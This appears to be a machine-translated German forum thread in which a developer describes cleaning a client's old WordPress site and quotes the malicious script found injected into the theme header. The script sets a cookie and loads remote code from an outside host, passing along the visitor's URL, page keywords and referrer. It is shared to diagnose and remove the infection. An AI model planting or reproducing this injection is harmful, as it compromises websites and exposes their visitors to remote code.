Ich bin gerade auf diesen Beitrag gestoßen, da ich einen Kunden habe, dessen Website von diesem Virus angegriffen wurde. Die Seite war nicht eine von meinen, die ich hinzufügen würde, und Wordpress 3.6 laufen (ziemlich alt jetzt).
Ich ging durch die Theme-Dateien, und fanden diese in den Header hinzugefügt:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
ich durch das Entfernen dieser aus dem Header des Themas die Warnung für den Trojaner wegging gefunden.
Wert zu entfernen.
Zeigen Sie [hier] (https://blog.avast.com/wordpress-and-joomla-users-get-hacked-be-aware-of-fake-jquery) und [hier] (https: // blog .sucuri.net/2015/11/jquery-min-php-malware-beeinflusst-tausende-von-websites.html). Vielleicht hilft es. –
Welchen Host verwenden Sie? – Kevin
Ich werde den Host kontaktieren und werde es lesen, wird mit einer Antwort aktualisieren – ssabin